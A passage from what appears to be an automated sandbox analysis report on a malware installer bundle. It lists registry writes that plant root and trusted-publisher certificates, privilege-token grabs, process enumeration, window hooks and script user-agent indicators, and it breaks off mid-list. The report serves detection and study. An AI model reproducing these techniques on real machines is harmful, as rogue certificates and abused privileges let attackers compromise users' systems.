1aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c00000001000000040000000008000004000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d4304000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e askinstall20.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 0300000001000000140000008d4c4a23ba9ee84ea7348fa98cc6e65fbb69de7b140000000100000014000000bbaf7e023dfaa6f13c848eadee3898ecd93232d4040000000100000010000000ab9b109ce8934f11e7cd22ed550680da0f0000000100000030000000a768343c4aeaced5c72f3571938864983a67ed49031c1da2495863caf65fe507011f7f0e70b6cb40e5631c07721be03419000000010000001000000082218ffb91733e64136be5719f57c3a15c0000000100000004000000001000001800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa24b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000002000000001000000820500003082057e30820466a003020102021067def43ef17bdae24ff5940606d2c084300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a308185310b3009060355040613024742311b30190603550408131247726561746572204d616e636865737465723110300e0603550407130753616c666f7264311a3018060355040a1311434f4d4f444f204341204c696d69746564312b302906035504031322434f4d4f444f205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010091e85492d20a56b1ac0d24ddc5cf446774992b37a37d23700071bc53dfc4fa2a128f4b7f1056bd9f7072b7617fc94b0f17a73de3b00461eeff1197c7f4863e0afa3e5cf993e6347ad9146be79cb385a0827a76af7190d7ecfd0dfa9c6cfadfb082f4147ef9bec4a62f4f7f997fb5fc674372bd0c00d689eb6b2cd3ed8f981c14ab7ee5e36efcd8a8e49224da436b62b855fdeac1bc6cb68bf30e8d9ae49b6c6999f878483045d5ade10d3c4560fc32965127bc67c3ca2eb66bea46c7c720a0b11f65de4808baa44ea9f283463784ebe8cc814843674e722a9b5cbd4c1b288a5c227bb4ab98d9eee05183c309464e6d3e99fa9517da7c3357413c8d51ed0bb65caf2c631adf57c83fbce95dc49baf4599e2a35a24b4baa9563dcf6faaff4958bef0a8fff4b8ade937fbbab8f40b3af9e843421e89d884cb13f1d9bbe18960b88c2856ac141d9c0ae771ebcf0edd3da996a148bd3cf7afb50d224cc01181ec563bf6d3a2e25bb7b204225295809369e88e4c65f191032d707402ea8b671529695202bbd7df506a5546bfa0a328617f70d0c3a2aa2c21aa47ce289c064576bf821827b4d5aeb4cb50e66bf44c867130e9a6df1686e0d8ff40ddfbd042887fa3333a2e5c1e41118163ce18716b2beca68ab7315c3a6a47e0c37959d6201aaff26a98aa72bc574ad24b9dbb10fcb04c41e5ed1d3d5e289d9cccbfb351daa747e584530203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e04160414bbaf7e023dfaa6f13c848eadee3898ecd93232d4300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c050003820101007ff25635b06d954a4e74af3ae26f018b87d33297edf840d2775311d7c7162ec69de64856be80a9f8bc78d2c86317ae8ced1631fa1f18c90ec7ee48799fc7c9b9bccc8815e36861d19f1d4b6181d7560463c2086926f0f0e52fdfc00a2ba905f4025a6a89d7b4844295e3ebf776205e35d9c0cd2508134c71388e87b0338491991e91f1ac9e3fa71d60812c364154a0e246060bac1bc799368c5ea10ba49ed9424624c5c55b81aeada0a0dc9f36b88dc21d15fa88ad8110391f44f02b9fdd10540c0734b136d114fd07023dff7255ab27d62c814171298d41f450571a7e6560afcbc5287698aeb3a853768be621526bea21d0840e494e8853da922ee71d0866d7 h3adlpt0ixf.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f vpn.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 tapinstall.exe -
Runs ping.exe 1 TTPs 3 IoCs
Processes:
PING.EXEPING.EXEPING.EXEpid process 4632 PING.EXE 5324 PING.EXE 6832 PING.EXE -
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 89 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 95 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 297 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 300 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
setups.tmpmultitimer.exekey.exeIBInstaller_97039.tmptskbyhbbld2.tmpwin1host.exevpn.tmprundll32.exesvchost.exefile.exe5768.tmp.exejfiag3g_gg.exesetups.tmprundll32.exe2.exerundll32.exeQJXVwuoxW.exeprolab.tmpirecord.tmppid process 3096 setups.tmp 3096 setups.tmp 224 multitimer.exe 224 multitimer.exe 224 multitimer.exe 224 multitimer.exe 224 multitimer.exe 224 multitimer.exe 224 multitimer.exe 224 multitimer.exe 224 multitimer.exe 224 multitimer.exe 224 multitimer.exe 224 multitimer.exe 224 multitimer.exe 224 multitimer.exe 224 multitimer.exe 224 multitimer.exe 224 multitimer.exe 224 multitimer.exe 1592 key.exe 1592 key.exe 2292 IBInstaller_97039.tmp 2292 IBInstaller_97039.tmp 1032 tskbyhbbld2.tmp 1032 tskbyhbbld2.tmp 5540 win1host.exe 5540 win1host.exe 5540 win1host.exe 5540 win1host.exe 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5720 rundll32.exe 5720 rundll32.exe 4784 svchost.exe 4784 svchost.exe 5340 file.exe 5340 file.exe 5340 file.exe 5340 file.exe 5340 file.exe 5340 file.exe 5340 file.exe 5340 file.exe 4576 5768.tmp.exe 4576 5768.tmp.exe 4764 jfiag3g_gg.exe 4764 jfiag3g_gg.exe 6480 setups.tmp 6480 setups.tmp 3592 rundll32.exe 3592 rundll32.exe 3992 2.exe 3992 2.exe 5804 rundll32.exe 5804 rundll32.exe 6708 QJXVwuoxW.exe 6708 QJXVwuoxW.exe 6660 prolab.tmp 6660 prolab.tmp 7124 irecord.tmp 7124 irecord.tmp -
Suspicious behavior: MapViewOfSection 3 IoCs
Processes:
cmd.exetoolspab1.exepid process 1464 cmd.exe 1464 cmd.exe 5816 toolspab1.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Setup.exeaskinstall20.exemultitimer.exetaskkill.exeMicrosoftEdge.exemultitimer.exekey.exeMicrosoftEdgeCP.exedescription pid process Token: SeDebugPrivilege 1896 Setup.exe Token: SeCreateTokenPrivilege 1388 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 1388 askinstall20.exe Token: SeLockMemoryPrivilege 1388 askinstall20.exe Token: SeIncreaseQuotaPrivilege 1388 askinstall20.exe Token: SeMachineAccountPrivilege 1388 askinstall20.exe Token: SeTcbPrivilege 1388 askinstall20.exe Token: SeSecurityPrivilege 1388 askinstall20.exe Token: SeTakeOwnershipPrivilege 1388 askinstall20.exe Token: SeLoadDriverPrivilege 1388 askinstall20.exe Token: SeSystemProfilePrivilege 1388 askinstall20.exe Token: SeSystemtimePrivilege 1388 askinstall20.exe Token: SeProfSingleProcessPrivilege 1388 askinstall20.exe Token: SeIncBasePriorityPrivilege 1388 askinstall20.exe Token: SeCreatePagefilePrivilege 1388 askinstall20.exe Token: SeCreatePermanentPrivilege 1388 askinstall20.exe Token: SeBackupPrivilege 1388 askinstall20.exe Token: SeRestorePrivilege 1388 askinstall20.exe Token: SeShutdownPrivilege 1388 askinstall20.exe Token: SeDebugPrivilege 1388 askinstall20.exe Token: SeAuditPrivilege 1388 askinstall20.exe Token: SeSystemEnvironmentPrivilege 1388 askinstall20.exe Token: SeChangeNotifyPrivilege 1388 askinstall20.exe Token: SeRemoteShutdownPrivilege 1388 askinstall20.exe Token: SeUndockPrivilege 1388 askinstall20.exe Token: SeSyncAgentPrivilege 1388 askinstall20.exe Token: SeEnableDelegationPrivilege 1388 askinstall20.exe Token: SeManageVolumePrivilege 1388 askinstall20.exe Token: SeImpersonatePrivilege 1388 askinstall20.exe Token: SeCreateGlobalPrivilege 1388 askinstall20.exe Token: 31 1388 askinstall20.exe Token: 32 1388 askinstall20.exe Token: 33 1388 askinstall20.exe Token: 34 1388 askinstall20.exe Token: 35 1388 askinstall20.exe Token: SeDebugPrivilege 224 multitimer.exe Token: SeDebugPrivilege 4760 taskkill.exe Token: SeDebugPrivilege 2580 MicrosoftEdge.exe Token: SeDebugPrivilege 2580 MicrosoftEdge.exe Token: SeDebugPrivilege 2580 MicrosoftEdge.exe Token: SeDebugPrivilege 2580 MicrosoftEdge.exe Token: SeDebugPrivilege 1280 multitimer.exe Token: SeImpersonatePrivilege 1592 key.exe Token: SeTcbPrivilege 1592 key.exe Token: SeChangeNotifyPrivilege 1592 key.exe Token: SeCreateTokenPrivilege 1592 key.exe Token: SeBackupPrivilege 1592 key.exe Token: SeRestorePrivilege 1592 key.exe Token: SeIncreaseQuotaPrivilege 1592 key.exe Token: SeAssignPrimaryTokenPrivilege 1592 key.exe Token: SeImpersonatePrivilege 1592 key.exe Token: SeTcbPrivilege 1592 key.exe Token: SeChangeNotifyPrivilege 1592 key.exe Token: SeCreateTokenPrivilege 1592 key.exe Token: SeBackupPrivilege 1592 key.exe Token: SeRestorePrivilege 1592 key.exe Token: SeIncreaseQuotaPrivilege 1592 key.exe Token: SeAssignPrimaryTokenPrivilege 1592 key.exe Token: SeDebugPrivilege 2484 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 2484 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 2484 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 2484 MicrosoftEdgeCP.exe Token: SeImpersonatePrivilege 1592 key.exe Token: SeTcbPrivilege 1592 key.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
Setup3310.tmph3adlpt0ixf.exeIBInstaller_97039.tmptskbyhbbld2.tmpvict.tmpvpn.tmppid process 4416 Setup3310.tmp 3972 h3adlpt0ixf.exe 2292 IBInstaller_97039.tmp 1032 tskbyhbbld2.tmp 1248 vict.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp 5276 vpn.tmp -
Suspicious use of SetWindowsHookEx 64 IoCs
Processes:
setups.exesetups.tmpMicrosoftEdge.execmd.execpyrix.exetskbyhbbld2.exetskbyhbbld2.tmpSetup3310.exeSetup3310.tmpvict.exevict.tmpIBInstaller_97039.exeIBInstaller_97039.tmpvpn.exevpn.tmpwinlthsth.exewin1host.exe1.exeSetup.exehjjgaa.exeRunWW.exejg7_7wjg.exeLabPicV3.exelylal220.exeguihuali-game.exeLabPicV3.tmplylal220.tmp22.exejfiag3g_gg.exeQJXVwuoxW.exeNoQIom6aF.exejfiag3g_gg.exesetups.exesetups.tmptapinstall.exeprolab.exeirecord.exeprolab.tmpirecord.tmptapinstall.exevict.exeSetup3310.exevpn.exevict.tmpcpyrix.exeSetup3310.tmpvpn.tmpwin1host.exemd6_6ydj.exeSetup.exe1.exeaskinstall31.exemd6_6ydj.execmd.exeaskinstall31.exeMicrosoftEdge.exemask_svc.exedw20.exedw20.execlient32.exemask_svc.exeMicrosoftEdge.exeMicrosoftEdgeCP.exepid process 4540 setups.exe 3096 setups.tmp 2580 MicrosoftEdge.exe 1464 cmd.exe 1464 cmd.exe 3668 cpyrix.exe 3144 tskbyhbbld2.exe 1032 tskbyhbbld2.tmp 1004 Setup3310.exe 4416 Setup3310.tmp 2432 vict.exe 1248 vict.tmp 4780 IBInstaller_97039.exe 2292 